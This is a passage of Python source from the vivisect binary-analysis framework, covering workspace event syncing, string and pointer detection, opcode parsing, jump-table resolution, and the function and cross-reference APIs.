chanid = next(self.chanids)
self.chan_lookup[chanid] = queue.Queue()
return chanid
def importWorkspace(self, wsevents):
"""
Import and initialize data from the given vivisect workspace
export.
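A minimal sketch (copying the event stream of one workspace into another):
events = othervw.exportWorkspace()
vw.importWorkspace(events)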
"""
# During import, if we have a server, be sure not to notify
# the server about the events it just gave us...
local = False
if self.server is not None:
local = True
# Process the events from the import data...
fe = self._fireEvent
for event, einfo in wsevents:
fe(event, einfo, local=local)
return
def exportWorkspace(self):
'''
Return the (probably big) list of events which define this
workspace.
'''
return self._event_list
def exportWorkspaceChanges(self):
'''
Export the list of events which have been applied to the
workspace since the last save.
'''
return self._event_list[self._event_saved:]
def initWorkspaceClient(self, remotevw):
"""
Initialize this workspace as a workspace
client to the given (potentially cobra remote)
workspace object.
"""
uname = e_config.getusername()
self.server = remotevw
self.rchan = remotevw.createEventChannel()
self.server.vprint('%s connecting...' % uname)
wsevents = self.server.exportWorkspace()
self.importWorkspace(wsevents)
self.server.vprint('%s connection complete!' % uname)
thr = threading.Thread(target=self._clientThread)
thr.daemon = True
thr.start()
def _clientThread(self):
"""
The thread that monitors events on a server to stay
in sync.
"""
if self.server is None:
raise Exception("_clientThread() with no server?!?!")
while self.server is not None:
event, einfo = self.server.waitForEvent(self.rchan)
self._fireEvent(event, einfo, local=True)
def waitForEvent(self, chanid, timeout=None):
"""
Return an event,eventinfo tuple.
"""
q = self.chan_lookup.get(chanid)
if q is None:
raise Exception("Invalid Channel")
return q.get(timeout=timeout)
def deleteEventChannel(self, chanid):
"""
Remove a previously allocated event channel from
the workspace.
"""
self.chan_lookup.pop(chanid)
def reprPointer(vw, va):
"""
Do your best to create a human-readable name for the
value of this pointer.
note: This differs from parent function from envi.cli:
* Locations database is checked
* Strings are returned, not named (partially)
* <function> + 0x<offset> is returned if inside a function
* <filename> + 0x<offset> is returned instead of loc_#####
"""
if va == 0:
return "NULL"
loc = vw.getLocation(va)
if loc is not None:
locva, locsz, lt, ltinfo = loc
if lt in (LOC_STRING, LOC_UNI):
return vw.reprVa(locva)
mbase, msize, mperm, mfile = vw.getMemoryMap(va)
ret = mfile + " + 0x%x" % (va - mbase)
sym = vw.getName(va, smart=True)
if sym is not None:
ret = sym
return ret
def reprVa(self, va):
"""
A quick way for scripts to get a string for a given virtual address.
"""
loc = self.getLocation(va)
if loc is not None:
return self.reprLocation(loc)
return "None"
def reprLocation(self, loctup):
if loctup is None:
return 'no loc info'
lva,lsize,ltype,tinfo = loctup
if ltype == LOC_OP:
op = self.parseOpcode(lva, arch=tinfo & envi.ARCH_MASK)
return repr(op)
elif ltype == LOC_STRING:
return repr(self.readMemory(lva, lsize).decode('utf-8'))
elif ltype == LOC_UNI:
# FIXME super ghetto "simple" unicode handling for now
bytes = b''.join(self.readMemory(lva, lsize).split(b'\x00'))
try:
return f"u'%s'" % bytes.decode('utf-8')
except:
return bytes.hex()
elif ltype == LOC_STRUCT:
lstruct = self.getStructure(lva, tinfo)
return repr(lstruct)
elif ltype == LOC_NUMBER:
value = self.parseNumber(lva, lsize)
hexstr = "0x%%.%dx" % lsize
hexstr = hexstr % value
if lsize == 1:
return "BYTE: %d (%s)" % (value, hexstr)
else:
return "%d BYTES: %d (%s)" % (lsize, value, hexstr)
elif ltype == LOC_IMPORT:
return "IMPORT: %s" % tinfo
elif ltype == LOC_POINTER:
return "PTR: %s" % self.arch.pointerString(self.getXrefsFrom(lva)[0][XR_TO])
else:
n = self.getName(lva)
if n is not None:
return n
return e_common.hexify(self.readMemory(lva, lsize))
def followPointer(self, va):
"""
Do pointer analysis and follow up on the recommendation
by creating locations etc...
"""
ltype = self.analyzePointer(va)
if ltype is None:
return False
# Note, we only implement the types possibly
# returned from analyzePointer...
if ltype == LOC_OP:
# NOTE: currently analyzePointer returns LOC_OP
# based on function entries, lets make a func too...
logger.debug('discovered new function (followPointer(0x%x))', va)
self.makeFunction(va)
return True
elif ltype == LOC_STRING:
self.makeString(va)
return True
elif ltype == LOC_UNI:
self.makeUnicode(va)
return True
return False
def processEntryPoints(self):
'''
Roll through EntryPoints and make them into functions (if not already)
'''
for eva in self.getEntryPoints():
if self.isFunction(eva):
continue
if not self.probeMemory(eva, 1, e_mem.MM_EXEC):
continue
logger.debug('processEntryPoint: 0x%x', eva)
self.makeFunction(eva)
def analyze(self):
"""
Call this to ask any available analysis modules
to do their thing...
"""
self.vprint('Beginning analysis...')
starttime = time.time()
# Now lets engage any analysis modules. If any modules return
# true, they managed to change things and we should run again...
for mname in self.amodlist:
mod = self.amods.get(mname)
self.vprint("Extended Analysis: %s" % mod.__name__)
try:
mod.analyze(self)
except Exception as e:
self.vprint("Extended Analysis Exception %s: %s" % (mod.__name__, e))
endtime = time.time()
self.vprint('...analysis complete! (%d sec)' % (endtime-starttime))
self.printDiscoveredStats()
self._fireEvent(VWE_AUTOANALFIN, (endtime, starttime))
def analyzeFunction(self, fva):
for fmname in self.fmodlist:
fmod = self.fmods.get(fmname)
try:
fmod.analyzeFunction(self, fva)
except Exception as e:
self.vprint("Function Analysis Exception for function 0x%x, module: %s" % (fva, fmod.__name__))
self.vprint("Exception Traceback: %s" % traceback.format_exc())
self.setFunctionMeta(fva, "%s fail" % fmod.__name__, traceback.format_exc())
def getStats(self):
stats = {
'functions': len(self.funcmeta),
'relocations': len(self.relocations),
}
return stats
def printDiscoveredStats(self):
(disc,
undisc,
numXrefs,
numLocs,
numFuncs,
numBlocks,
numOps,
numUnis,
numStrings,
numNumbers,
numPointers,
numVtables) = self.getDiscoveredInfo()
percentage = disc*100.0/(disc+undisc) if disc or undisc else 0
self.vprint("Percentage of discovered executable surface area: %.1f%% (%s / %s)" % (percentage, disc, disc+undisc))
self.vprint(" Xrefs/Blocks/Funcs: (%s / %s / %s)" % (numXrefs, numBlocks, numFuncs))
self.vprint(" Locs, Ops/Strings/Unicode/Nums/Ptrs/Vtables: (%s: %s / %s / %s / %s / %s / %s)" % (numLocs, numOps, numStrings, numUnis, numNumbers, numPointers, numVtables))
def getDiscoveredInfo(self):
"""
Return a tuple of discovery statistics for all executable maps: (discovered_bytes, undiscovered_bytes, xrefs, locations, functions, codeblocks, opcodes, unicode_strings, ascii_strings, numbers, pointers, vtables).
"""
disc = 0
undisc = 0
for mva, msz, mperms, mname in self.getMemoryMaps():
if not self.isExecutable(mva):
continue
off = 0
while off < msz:
loc = self.getLocation(mva+off)
if loc is None:
off += 1
undisc += 1
else:
off += loc[L_SIZE]
disc += loc[L_SIZE]
numXrefs = len(self.getXrefs())
numLocs = len(self.getLocations())
numFuncs = len(self.getFunctions())
numBlocks = len(self.getCodeBlocks())
numOps = len(self.getLocations(LOC_OP))
numUnis = len(self.getLocations(LOC_UNI))
numStrings = len(self.getLocations(LOC_STRING))
numNumbers = len(self.getLocations(LOC_NUMBER))
numPointers = len(self.getLocations(LOC_POINTER))
numVtables = len(self.getLocations(LOC_VFTABLE))
return disc, undisc, numXrefs, numLocs, numFuncs, numBlocks, numOps, numUnis, numStrings, numNumbers, numPointers, numVtables
def getImports(self):
"""
Return a list of imports, including delay imports, in location tuple format.
"""
return list(self.getLocations(LOC_IMPORT))
def makeImport(self, va, libname, impname):
"""
Add an import entry.
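A minimal sketch (the va is hypothetical):
vw.makeImport(va, 'kernel32', 'CreateFileA')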
"""
if libname != '*':
libname = self.normFileName(libname)
tinfo = "%s.%s" % (libname, impname)
self.makeName(va, "%s_%.8x" % (tinfo, va))
return self.addLocation(va, self.psize, LOC_IMPORT, tinfo=tinfo)
def getExports(self):
"""
Return a list of exports in (va,etype,name,filename) tuples.
"""
return list(self.exports)
def addExport(self, va, etype, name, filename, makeuniq=False):
"""
Add an already created export object.
makeuniq allows Vivisect to append some number to make the name unique.
This behavior allows for colliding names (eg. different versions of a function)
to coexist in the same workspace.
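A minimal sketch (etype is one of the EXP_* constants from vivisect.const,
eg. EXP_FUNCTION; the va is hypothetical):
vw.addExport(va, EXP_FUNCTION, 'DoThing', 'mylib', makeuniq=True)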
"""
rname = "%s.%s" % (filename,name)
# check if it exists and is *not* what we're trying to make it
curval = self.vaByName(rname)
if curval is not None and curval != va and not makeuniq:
# if we don't force it to make a uniq name, bail
raise Exception("Duplicate Name: %s => 0x%x (cur: 0x%x)" % (rname, va, curval))
rname = self.makeName(va, rname, makeuniq=makeuniq)
self._fireEvent(VWE_ADDEXPORT, (va,etype,name,filename))
def getExport(self, va):
"""
Get a reference to the export object at the given va
(or none).
"""
return self.exports_by_va.get(va)
def findPointers(self, cache=True):
"""
Search through all currently "undefined" space and see
if you can find pointers there... Returns a list of tuples
where the tuple is (<ptr at>,<pts to>).
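A minimal sketch:
for ptrva, destva in vw.findPointers():
print('0x%.8x -> 0x%.8x' % (ptrva, destva))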
"""
align = self.arch.archGetPointerAlignment()
if cache:
ret = self.getTransMeta('findPointers')
if ret is not None:
# Filter locations added since last run...
ret = [(va, x) for (va, x) in ret if self.getLocation(va) is None and not (va % align)]
self.setTransMeta('findPointers', ret)
return ret
ret = []
size = self.psize
for mva, msize, mperm, mname in self.getMemoryMaps():
offset, bytes = self.getByteDef(mva)
maxsize = len(bytes) - size
# if our memory map is not starting off aligned appropriately
if offset % align:
offset &= -align
offset += align
while offset + size < maxsize:
va = mva + offset
loctup = self.getLocation(va)
if loctup is not None:
offset += loctup[L_SIZE]
if offset % align:
offset += align
offset &= -align
continue
x = e_bits.parsebytes(bytes, offset, size, bigend=self.bigend)
if self.isValidPointer(x):
ret.append((va, x))
offset += size
continue
offset += align
offset &= -align
if cache:
self.setTransMeta('findPointers', ret)
return ret
def detectString(self, va):
'''
If the address appears to be the start of a string, then
return the string length in bytes, else return -1.
'''
plen = 0 # pascal string length
dlen = 0 # delphi string length
left = self.getMemoryMap(va-4)
# DEV: Make sure there's space left in the map
if self.isReadable(va-4) and left and (left[MAP_VA] + left[MAP_SIZE] - va + 4) >= 4:
plen = self.readMemValue(va - 2, 2) # pascal string length
dlen = self.readMemValue(va - 4, 4) # delphi string length
offset, bytez = self.getByteDef(va)
maxlen = len(bytez) - offset
count = 0
while count < maxlen:
# If we hit another thing, then probably not.
# Ignore when count==0 so detection can check something
# already set as a location.
if count > 0:
loc = self.getLocation(va+count)
if loc is not None:
if loc[L_LTYPE] == LOC_STRING:
if loc[L_VA] == va:
return loc[L_SIZE]
if bytez[offset+count] != 0:
# we probably hit a case where the string at the lower va is
# technically the start of the full string, but the binary does
# some optimizations and just ref's inside the full string to save
# some space
return count + loc[L_SIZE]
return loc[L_VA] - (va + count) + loc[L_SIZE]
return -1
c = bytez[offset+count]
# The "strings" algo basically says 4 or more...
if c == 0 and count >= 4:
return count
elif c == 0 and (count == dlen or count == plen):
return count
if chr(c) not in string.printable:
return -1
count += 1
return -1
def isProbablyString(self, va):
if self.detectString(va) > 0 :
return True
return False
def detectUnicode(self, va):
'''
If the address appears to be the start of a unicode string, then
return the string length in bytes, else return -1.
Detection only succeeds if the memory location is likely
*simple* UTF16-LE unicode (<ascii><0><ascii><0><0><0>).
'''
# FIXME this does not detect Unicode...
offset, bytes = self.getByteDef(va)
maxlen = len(bytes) - offset
count = 0
if maxlen < 2:
return -1
charset = bytes[offset + 1]
while count < maxlen:
# If we hit another thing, then probably not.
# Ignore when count==0 so detection can check something
# already set as a location.
if (count > 0):
loc = self.getLocation(va+count)
if loc:
if loc[L_LTYPE] == LOC_UNI:
if loc[L_VA] == va:
return loc[L_SIZE]
if bytes[offset+count] != 0:
# same thing as in the string case, a binary can ref into a string
# only part of the full string.
return count + loc[L_SIZE]
return loc[L_VA] - (va + count) + loc[L_SIZE]
return -1
c0 = bytes[offset+count]
if offset + count+1 >= len(bytes):
return -1
c1 = bytes[offset+count+1]
# If we find our null terminator after more
# than 4 chars, we're probably a real string
if c0 == 0:
if count > 8:
return count
return -1
# If the first byte char isn't printable, then
# we're probably not a real "simple" ascii string
if chr(c0) not in string.printable:
return -1
# If it's not null,char,null,char then it's
# not simple unicode...
if c1 != charset:
return -1
count += 2
return -1
def isProbablyUnicode(self, va):
if self.detectUnicode(va) > 0 :
return True
return False
def isProbablyCode(self, va, **kwargs):
"""
Most of the time, absolute pointers which point to code
point to the function entry, so test it for the sig.
"""
if not self.isExecutable(va):
return False
ret = self.isFunctionSignature(va)
if ret:
return ret
rerun = kwargs.pop('rerun', False)
if va in self.iscode and not rerun:
return self.iscode[va]
self.iscode[va] = True
# because we're doing partial emulation, demote some of the logging
# messages to low priority.
kwargs['loglevel'] = e_common.EMULOG
emu = self.getEmulator(**kwargs)
wat = v_emucode.watcher(self, va)
emu.setEmulationMonitor(wat)
try:
emu.runFunction(va, maxhit=1)
except Exception as e:
self.iscode[va] = False
return False
if wat.looksgood():
self.iscode[va] = True
else:
self.iscode[va] = False
return self.iscode[va]
#################################################################
#
# Opcode API
#
def parseOpcode(self, va, arch=envi.ARCH_DEFAULT, skipcache=False):
'''
Parse an opcode from the specified virtual address.
Example: op = m.parseOpcode(0x7c773803, skipcache=True)
Set skipcache=True in order to bypass the opcode cache and force a reparsing of bytes
'''
off, b = self.getByteDef(va)
if arch == envi.ARCH_DEFAULT:
loctup = self.getLocation(va)
# XXX - in the case where we've set a location on what should be an
# opcode, make sure L_LTYPE == LOC_OP; if not, keep the original arch param
# so that at least parseOpcode won't fail
if loctup is not None and loctup[L_TINFO] and loctup[L_LTYPE] == LOC_OP:
arch = loctup[L_TINFO]
if not skipcache:
key = (va, arch, b[off:off+16])
valu = self._op_cache.get(key, None)
if not valu:
valu = self.imem_archs[(arch & envi.ARCH_MASK) >> 16].archParseOpcode(b, off, va)
self._op_cache[key] = valu
return valu
return self.imem_archs[(arch & envi.ARCH_MASK) >> 16].archParseOpcode(b, off, va)
def clearOpcache(self):
'''
Remove all elements from the opcode cache
'''
self._op_cache.clear()
def iterJumpTable(self, startva, step=None, maxiters=None, rebase=False):
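'''
Iterate the pointer-sized (or step-sized) entries of a jump table starting
at startva, yielding each target address that still looks like valid code.
Iteration stops at invalid pointers, STOP_LOCS locations, entries which have
other xrefs to them, or after maxiters entries.
'''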
if not step:
step = self.psize
fname = self.getMemoryMap(startva)
if fname is None:
return
fname = fname[3]
imgbase = self.getFileMeta(fname, 'imagebase')
iters = 0
ptrbase = startva
rdest = self.readMemValue(ptrbase, step)
if rebase and rdest < imgbase:
rdest += imgbase
while self.isValidPointer(rdest) and self.isProbablyCode(rdest):
if self.analyzePointer(ptrbase) in STOP_LOCS:
break
yield rdest
ptrbase += step
if len(self.getXrefsTo(ptrbase)):
break
rdest = self.readMemValue(ptrbase, step)
if rebase and rdest < imgbase:
rdest += imgbase
iters += 1
if maxiters is not None and iters >= maxiters:
break
def moveCodeBlock(self, cbva, newfva):
cb = self.getCodeBlock(cbva)
if cb is None:
return
if cb[CB_FUNCVA] == newfva:
return
self.delCodeBlock(cb)
self.addCodeBlock((cb[CB_VA], cb[CB_SIZE], newfva))
def splitJumpTable(self, callingVa, prevRefVa, newTablAddr, rebase=False, psize=4):
'''
So we have the case where if we have two jump tables laid out consecutively in memory (let's
call them tables Foo and Bar, with Foo coming before Bar), and we see Foo first, we're going to
recognize Foo as being a giant table, with all of Bar overlapping with Foo
So we need to construct a list of now invalid references from prevRefVa, starting at newTablAddr
newTablAddr should point to the new jump table, and those new codeblock VAs should be removed from
the list of references that prevRefVa refs to (and delete the name)
We also need to check to see if the functions themselves line up (ie, do these two jump tables
even belong to the same function, or should we remove the code block from the function entirely?)
'''
# Due to how codeflow happens, we have no guarantee if these two adjacent jump tables are
# even in the same function
codeblocks = set()
curfva = self.getFunction(callingVa)
# collect all the entries for the new jump table
for cb in self.iterJumpTable(newTablAddr, rebase=rebase, step=psize):
if cb in codeblocks:
continue
codeblocks.add(cb)
prevcb = self.getCodeBlock(cb)
if prevcb is None:
continue
# we may also have to break these codeblocks from the old function
# 1 -- new func is none, old func is none
# * can't happen. if the codeblock is defined, we at least have an old function
# 2 -- new func is not none, old func is none
# * Can't happen. see above
# 3 -- new func is none, old func is not none
# * delete the codeblock. we've dropped into a new function that is different from the old
# since how codeflow discover functions, we should have all the code blocks for function
# 4 -- neither are none
# * moveCodeBlock -- that func will handle whether or not functions are the same
if curfva is not None:
self.moveCodeBlock(cb, curfva)
else:
self.delCodeBlock(prevcb[CB_VA])
# now delete those entries from the previous jump table
oldrefs = self.getXrefsFrom(prevRefVa)
todel = [xref for xref in oldrefs if xref[1] in codeblocks]
for xref in todel:
self.setComment(xref[1], None)
self.delXref(xref)
def makeJumpTable(self, op, tova, rebase=False, psize=4):
fname = self.getFileByVa(tova)
imgbase = self.getFileMeta(fname, 'imagebase')
ptrbase = tova
rdest = self.readMemValue(ptrbase, psize)
if rebase and rdest < imgbase:
rdest += imgbase
# if there's already an Xref to this address from another jump table, we overshot
# the other table, and need to cut that one short, delete its Xrefs starting at this one
# and then let the rest of this function build the new jump table
# This jump table also may not be in the same function as the other jump table, so we need
# to remove those codeblocks (and child codeblocks) from this function
# at this point, rdest should be the first codeblock in the jumptable, so get all the xrefs to him
# (but skipping over the current jumptable base address we're looking at)
for xrfrom, xrto, rtype, rflags in self.getXrefsTo(rdest):
if tova == xrfrom:
continue
refva, refsize, reftype, refinfo = self.getLocation(xrfrom)
if reftype != LOC_OP:
continue
# If we've already constructed this opcode location and made the xref to the new codeblock,
# that should mean we've already made the jump table, so there should be no need to split this
# jump table.
if refva == op.va:
continue
refop = self.parseOpcode(refva)
for refbase, refbflags in refop.getBranches():
if refbflags & envi.BR_TABLE:
self.splitJumpTable(op.va, refva, tova, psize=psize)
tabdone = {}
for i, rdest in enumerate(self.iterJumpTable(ptrbase, rebase=rebase, step=psize)):
if not tabdone.get(rdest):
tabdone[rdest] = True
self.addXref(op.va, rdest, REF_CODE, envi.BR_COND)
if self.getName(rdest) is None:
self.makeName(rdest, "case%d_%.8x" % (i, op.va))
else:
cmnt = self.getComment(rdest)
if cmnt is None:
self.setComment(rdest, "Other Case(s): %d" % i)
else:
cmnt += ", %d" % i
self.setComment(rdest, cmnt)
# This must be second (len(xrefsto))
self.addXref(op.va, tova, REF_PTR)
def makeOpcode(self, va, op=None, arch=envi.ARCH_DEFAULT):
"""
Create a single opcode location. If you have already parsed the
opcode object, you may pass it in.
"""
if op is None:
try:
op = self.parseOpcode(va, arch=arch)
except envi.InvalidInstruction as msg:
# FIXME something is just not right about this...
bytez = self.readMemory(va, 16)
logger.warning("Invalid Instruct Attempt At:", hex(va), e_common.hexify(bytez))
raise InvalidLocation(va, msg)
except Exception as msg:
raise InvalidLocation(va, msg)
# Add our opcode location first (op flags become ldata)
loc = self.addLocation(va, op.size, LOC_OP, op.iflags)
# This takes care of all normal indirect immediates
brdone = {}
brlist = op.getBranches()
for tova, bflags in brlist:
# If there were unresolved dynamic branches, oh well...
if tova is None:
continue
if not self.isValidPointer(tova):
continue
brdone[tova] = True
# Special case, if it's a table branch, lets resolve it now.
if bflags & envi.BR_TABLE:
self.makeJumpTable(op, tova)
elif bflags & envi.BR_DEREF:
self.addXref(va, tova, REF_DATA)
ptrdest = None
if self.getLocation(tova) is None:
ptrdest = self.makePointer(tova, follow=False)
# If the actual dest is executable, make a code ref fixup
# which *removes* the deref flag...
# If we're an xref to something real, rip out the deref flag, but if we're
# an xref to a big fat 0, fuggedaboutit
if ptrdest and self.analyzePointer(ptrdest[0]):
self.addXref(va, ptrdest[0], REF_CODE, bflags & ~envi.BR_DEREF)
else:
self.addXref(va, tova, REF_CODE, bflags)
else:
# vivisect does NOT create REF_CODE entries for
# instruction fall through
if bflags & envi.BR_FALL:
continue
self.addXref(va, tova, REF_CODE, bflags)
# Check the instruction for static d-refs
for oidx, o in op.genRefOpers(emu=None):
# FIXME it would be nice if we could just do this one time
# in the emulation pass (or hint emulation that some have already
# been done.
# unfortunately, emulation pass only occurs for code identified
# within a marked function.
# future fix: move this all into VivCodeFlowContext.
# Does the operand touch memory ?
if o.isDeref():
ref = o.getOperAddr(op, None)
if brdone.get(ref, False):
continue
if ref is not None and self.isValidPointer(ref):
# It's a data reference. lets also check if the data is
# a pointer.
self.addXref(va, ref, REF_DATA)
# If we don't already know what type this location is,
# lets make it either a pointer or a number...
if self.getLocation(ref) is None:
self.guessDataPointer(ref, o.tsize)
else:
ref = o.getOperValue(op)
if brdone.get(ref, False):
continue
if ref is not None and type(ref) is int and self.isValidPointer(ref):
self.addXref(va, ref, REF_PTR)
return loc
def _dbgLocEntry(self, va):
"""
Display the human-happy version of a location
"""
loc = self.getLocation(va)
if loc is None:
return 'None'
lva, lsz, ltype, ltinfo = loc
ltvar = loc_lookups.get(ltype)
ltdesc = loc_type_names.get(ltype)
locrepr = '(0x%x, %d, %s, %r) # %s' % (lva, lsz, ltvar, ltinfo, ltdesc)
return locrepr
def updateCallsFrom(self, fva, ncalls):
function = self.getFunction(fva)
prev_call = self.getFunctionMeta(function, 'CallsFrom')
newcall = set(prev_call).union(set(ncalls))
self.setFunctionMeta(function, 'CallsFrom', list(newcall))
def makeCode(self, va, arch=envi.ARCH_DEFAULT, fva=None):
"""
Attempt to begin code-flow based disassembly by
starting at the given va. The va will be made into
an OpcodeLoc and refs will be walked continuing to
make code where possible.
"""
# If this is already a location, bail.
if self.isLocation(va):
return
calls_from = self.cfctx.addCodeFlow(va, arch=arch)
if fva is None:
self.setVaSetRow('CodeFragments', (va, calls_from))
else:
self.updateCallsFrom(fva, calls_from)
return calls_from
def previewCode(self, va, arch=envi.ARCH_DEFAULT):
'''
Show the repr of an instruction in the current canvas *before* making it a location.
'''
try:
op = self.parseOpcode(va, arch)
if op is None:
self.vprint("0x%x - None")
else:
self.vprint("0x%x (%d bytes) %s" % (va, len(op), repr(op)))
except Exception:
self.vprint("0x%x - decode exception" % va)
logger.exception("preview opcode exception:")
#################################################################
#
# Function API
#
def isFunction(self, funcva):
"""
Return True if funcva is a function entry point.
"""
return self.funcmeta.get(funcva) is not None
def isFunctionThunk(self, funcva):
"""
Return True if funcva is a function thunk
"""
# TODO: could we do more here?
try:
return self.getFunctionMeta(funcva, 'Thunk') is not None
except InvalidFunction:
return False
def getFunctions(self):
"""
Return a list of the function virtual addresses
defined in the workspace.
"""
return list(self.funcmeta.keys())
def getFunction(self, va):
"""
Return the VA for this function. This will search code blocks
and check for a function va.
"""
if self.funcmeta.get(va) is not None:
return va
cbtup = self.getCodeBlock(va)
if cbtup is not None:
return cbtup[CB_FUNCVA]
return None
def makeFunction(self, va, meta=None, arch=envi.ARCH_DEFAULT):
"""
Do parsing for function information and add a new function doodad.
This function should probably only be called once code-flow for the
area is complete.
"""
logger.debug('makeFunction(0x%x, %r, 0x%x)', va, meta, arch)
if self.isFunction(va):
logger.debug('0x%x is already a function, skipping', va)
return
if not self.isValidPointer(va):
raise InvalidLocation(va)
loc = self.getLocation(va)
if loc is not None and loc[L_TINFO] is not None and loc[L_LTYPE] == LOC_OP:
arch = loc[L_TINFO]
realfva = self.cfctx.addEntryPoint(va, arch=arch)
if meta is not None:
for key, val in meta.items():
self.setFunctionMeta(realfva, key, val)
return realfva
def delFunction(self, funcva):
"""
Remove a function, its code blocks and all associated meta
"""
if self.funcmeta.get(funcva) is None:
raise InvalidLocation(funcva)
self._fireEvent(VWE_DELFUNCTION, funcva)
def setFunctionArg(self, fva, idx, atype, aname):
'''
Set the name and type information for a single function argument by index.
Example:
# If we were setting up main...
vw.setFunctionArg(fva, 0, 'int','argc')
vw.setFunctionArg(fva, 1, 'char **','argv')
'''
rettype,retname,callconv,callname,callargs = self.getFunctionApi(fva)
while len(callargs) <= idx:
callargs.append( ('int','arg%d' % len(callargs)) )
callargs[idx] = (atype,aname)
self.setFunctionApi(fva, (rettype,retname,callconv,callname,callargs))
def getFunctionArgs(self, fva):
'''
Returns the list of (typename,argname) tuples which define the
arguments for the specified function.
Example:
for typename,argname in vw.getFunctionArgs(fva):
print('Takes: %s %s' % (typename,argname))
'''
rettype, retname, callconv, callname, callargs = self.getFunctionApi(fva)
return list(callargs)
def getFunctionApi(self, fva):
'''
Retrieve the API definition for the given function address.
Returns: an API tuple (similar to the impapi subsystem); a default 'void' API is returned if none has been set
( rettype, retname, callconv, funcname, ( (argtype, argname), ...) )
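A minimal sketch:
rettype, retname, callconv, callname, callargs = vw.getFunctionApi(fva)
for argtype, argname in callargs:
print('%s %s' % (argtype, argname))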
'''
ret = self.getFunctionMeta(fva, 'api')
if ret is not None:
return ret
defcall = self.getMeta('DefaultCall','unkcall')
return ('void', None, defcall, None, ())
def setFunctionApi(self, fva, apidef):
'''
Set a function's API definition.
NOTE: apidef is a tuple similar to the impapi subsystem
( rettype, retname, callconv, funcname, ( (argtype, argname), ...) )
Example:
apidef = ('int','size','stdcall','getThingSize', ( ('void *','thing'), ))
vw.setFunctionApi(fva, apidef)
'''
self.setFunctionMeta(fva, 'api', apidef)
def getFunctionLocals(self, fva):
'''
Retrieve the list of (fva,spdelta,symtype,syminfo) tuples which
represent the given function's local memory offsets.
'''
if not self.isFunction(fva):
raise InvalidFunction(fva)
return list(self.localsyms[fva].values())
def getFunctionLocal(self, fva, spdelta):
'''
Retrieve a function local symbol definition as a
(typename,symname) tuple or None if not found.
NOTE: If the local symbol references a LSYM_FARG, this API
will resolve the argument name/type from the function API
definition.
Example:
locsym = vw.getFunctionLocal(fva, 8)
if locsym:
symtype,symname = locsym
print('%s %s;' % (symtype,symname))
'''
locsym = self.localsyms[fva].get(spdelta)
if locsym is None:
return None
fva,spdelta,symtype,syminfo = locsym
if symtype == LSYM_NAME:
return syminfo
if symtype == LSYM_FARG:
apidef = self.getFunctionApi(fva)
if apidef is None:
return None
funcargs = apidef[-1]
if syminfo >= len(funcargs):
return None
return funcargs[syminfo]
raise Exception('Unknown Local Symbol Type: %d' % symtype)
def setFunctionLocal(self, fva, spdelta, symtype, syminfo):
'''
Assign a local symbol within a function (addressed
by delta from initial sp). For each symbol, a "symtype"
and "syminfo" field are used to specify the details.
Example:
# Setup a regular local integer
vw.setFunctionLocal(fva, -4, LSYM_NAME, ('int','x'))
# Setup a link to a stack argument... (ie. i386 cdecl)
vw.setFunctionLocal(fva, 4, LSYM_FARG, 0)
# Setup amd64 style shadow space
vw.setFunctionLocal(fva, 8, LSYM_NAME, ('void *','shadow0'))
'''
metaname = 'LocalSymbol:%d' % spdelta
metavalue = (fva,spdelta,symtype,syminfo)
self.setFunctionMeta(fva, metaname, metavalue)
def setFunctionMeta(self, funcva, key, value):
"""
Set meta key,value pairs that describe a particular
function (by funcva).
Example: vw.setFunctionMeta(fva, "WootKey", 10)
"""
if not self.isFunction(funcva):
raise InvalidFunction(funcva)
self._fireEvent(VWE_SETFUNCMETA, (funcva, key, value))
def getFunctionMeta(self, funcva, key, default=None):
m = self.funcmeta.get(funcva)
if m is None:
raise InvalidFunction(funcva)
return m.get(key, default)
def getFunctionMetaDict(self, funcva):
"""
Return the entire dictionary of function metadata
for the function specified at funcva
"""
return self.funcmeta.get(funcva)
def getFunctionBlocks(self, funcva):
"""
Return the code-block objects for the given function va
"""
ret = self.codeblocks_by_funcva.get(funcva)
if ret is None:
ret = []
return ret
def makeFunctionThunk(self, fva, thname, addVa=True, filelocal=False):
"""
Inform the workspace that a given function is considered a "thunk" to another.
This allows the workspace to process argument inheritance and several other things.
Usage: vw.makeFunctionThunk(0xvavavava, "kernel32.CreateProcessA")
"""
self.checkNoRetApi(thname, fva)
self.setFunctionMeta(fva, "Thunk", thname)
n = self.getName(fva)
base = thname.split(".")[-1]
if addVa:
name = "%s_%.8x" % (base,fva)
else:
name = base
newname = self.makeName(fva, name, filelocal=filelocal, makeuniq=True)
api = self.getImpApi(thname)
if api:
# Set any argument names that are None
rettype,retname,callconv,callname,callargs = api
callargs = [ callargs[i] if callargs[i][1] else (callargs[i][0],'arg%d' % i) for i in range(len(callargs)) ]
self.setFunctionApi(fva, (rettype,retname,callconv,callname,callargs))
def getCallers(self, va):
'''
Get the va for all the callers of the given function/import.
Example:
for va in vw.getCallers( importva ):
dostuff(va)
'''
ret = []
for fromva, tova, rtype, rflags in self.getXrefsTo(va, rtype=REF_CODE):
if rflags & envi.BR_PROC:
ret.append(fromva)
return ret
def getCallGraph(self):
'''
Retrieve a visgraph Graph object representing all known inter procedural
branches in the workspace. Each node has an ID that is the same as the
function va.
Example:
graph = vw.getCallGraph()
'''
return self._call_graph
def getFunctionGraph(self, fva):
'''
Retrieve a code-block graph for the specified virtual address.
Procedural branches (ie, calls) will not be followed during graph
construction.
'''
return viv_codegraph.FuncBlockGraph(self,fva)
def getImportCallers(self, name):
"""
Get a list of all the callers who reference the specified import
by name. (If we detect that the name is actually *in* our workspace,
return those callers too...)
"""
ret = []
# If it's a local function, do that too..
fva = self.vaByName(name)
if fva is not None and self.isFunction(fva):
ret = self.getCallers(fva)
for fva in self.getFunctions():
if self.getFunctionMeta(fva, 'Thunk') == name:
ret.extend( self.getCallers( fva ) )
for lva,lsize,ltype,tinfo in self.getLocations(LOC_IMPORT):
if tinfo == name:
ret.extend( self.getCallers( lva ) )
return ret
#################################################################
#
# Xref API
#
def getXrefs(self, rtype=None):
"""
Return the entire list of XREF tuples for this workspace.
"""
if rtype:
return [ xtup for xtup in self.xrefs if xtup[XR_RTYPE] == rtype ]
return self.xrefs
def getXrefsFrom(self, va, rtype=None):
"""
Return a list of tuples for the xrefs whose origin is the
specified va. Optionally, only return xrefs whose type
field is rtype if specified.
example:
for fromva, tova, rtype, rflags in vw.getXrefsFrom(0x41414141):
dostuff(tova)
"""
ret = []
xrefs = self.xrefs_by_from.get(va, None)
if xrefs is None:
return ret
if rtype is None:
return xrefs
return [ xtup for xtup in xrefs if xtup[XR_RTYPE] == rtype ]
def getXrefsTo(self, va, rtype=None):
"""
Get a list of xrefs which point to the given va. Optionally,
specify an rtype to get only xrefs of that type.
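example (the REF_CODE filter is optional):
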